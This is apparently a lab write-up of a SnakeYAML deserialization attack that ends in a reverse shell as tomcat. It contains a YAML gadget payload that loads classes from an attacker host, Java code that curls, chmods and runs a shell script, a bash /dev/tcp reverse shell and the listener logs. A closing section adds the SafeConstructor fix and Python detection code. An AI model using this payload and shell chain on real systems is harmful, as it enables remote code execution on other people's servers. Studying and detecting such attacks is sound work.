https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858
https://github.com/mbechler/marshalsec
yaml:
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.15/"]
  ]]
]
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.227 - - [04/May/2021 22:07:49] code 404, message File not found
10.10.10.227 - - [04/May/2021 22:07:49] "HEAD /META-INF/services/javax.script.ScriptEngineFactory HTTP/1.1" 404 -
# shell.sh
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/10.10.14.15/6969 0>&1'
# changes to code (constructor of artsploit/AwesomeScriptEngineFactory, the class the target fetches from the listener)
// Runs on the target when the ServiceLoader instantiates the factory.
public AwesomeScriptEngineFactory() throws Exception {
    try {
        // fetch the script from the listener, mark it executable, run it
        Runtime.getRuntime().exec("curl http://10.10.14.15/shell.sh -o /tmp/shell.sh");
        Runtime.getRuntime().exec("chmod +x /tmp/shell.sh");
        Runtime.getRuntime().exec("./tmp/shell.sh");
    } catch (IOException e) {
        e.printStackTrace();
    }
}
10.10.10.227 - - [04/May/2021 22:54:04] "HEAD /META-INF/services/javax.script.ScriptEngineFactory HTTP/1.1" 200 -
10.10.10.227 - - [04/May/2021 22:54:04] "GET /META-INF/services/javax.script.ScriptEngineFactory HTTP/1.1" 200 -
10.10.10.227 - - [04/May/2021 22:54:04] "GET /artsploit/AwesomeScriptEngineFactory.class HTTP/1.1" 200 -
10.10.10.227 - - [04/May/2021 22:54:04] "GET /shell.sh HTTP/1.1" 200 -
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.227] 34808
bash: cannot set terminal process group (829): Inappropriate ioctl for device
bash: no job control in this shell
whoami;id
whoami;id
tomcat
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
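On the Java side the fix is to parse untrusted YAML with SnakeYAML's SafeConstructor (new Yaml(new SafeConstructor())), which only accepts the standard YAML type tags and rejects the !!java.* class tags in the payload above. The following Python example is added here (my code, not part of the writeup) and implements the matching detection checks: it flags the non-standard !! tags in a YAML document, and it picks the ServiceLoader probe for /META-INF/services/javax.script.ScriptEngineFactory out of access-log lines of the format shown above, which is the fingerprint this gadget chain leaves on any web or egress-proxy log.

```python
import re

# Global tags SafeConstructor resolves to standard YAML types. Any other "!!" tag
# is resolved as a Java class name by SnakeYAML's default Constructor.
SAFE_TAGS = {"null", "bool", "int", "float", "binary", "timestamp",
             "omap", "pairs", "set", "str", "seq", "map"}
GLOBAL_TAG = re.compile(r"!!([A-Za-z_][\w.$]*)")

def unsafe_yaml_tags(document: str) -> list:
    """Return the '!!' tags that name Java classes instead of YAML types."""
    return [t for t in GLOBAL_TAG.findall(document) if t not in SAFE_TAGS]

# The ScriptEngineManager gadget makes the JVM's ServiceLoader request this
# provider-configuration path from the URL given to URLClassLoader.
SERVICE_PROBE = "/META-INF/services/javax.script.ScriptEngineFactory"
ACCESS_LINE = re.compile(r'^(\S+) .*?"(HEAD|GET) (\S+) HTTP/[\d.]+" (\d{3})')

def serviceloader_probes(log_lines) -> list:
    """Return (client, method, status) for log lines requesting SERVICE_PROBE."""
    hits = []
    for line in log_lines:
        m = ACCESS_LINE.match(line)
        if m and m.group(3) == SERVICE_PROBE:
            hits.append((m.group(1), m.group(2), int(m.group(4))))
    return hits

# Sample input taken from the payload and log lines shown on this page.
PAYLOAD = """!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.15/"]
  ]]
]"""
LOG_LINES = [
    "10.10.10.227 - - [04/May/2021 22:07:49] code 404, message File not found",
    '10.10.10.227 - - [04/May/2021 22:07:49] "HEAD /META-INF/services/'
    'javax.script.ScriptEngineFactory HTTP/1.1" 404 -',
]

if __name__ == "__main__":
    print("unsafe tags:", unsafe_yaml_tags(PAYLOAD))
    print("ServiceLoader probes:", serviceloader_probes(LOG_LINES))
```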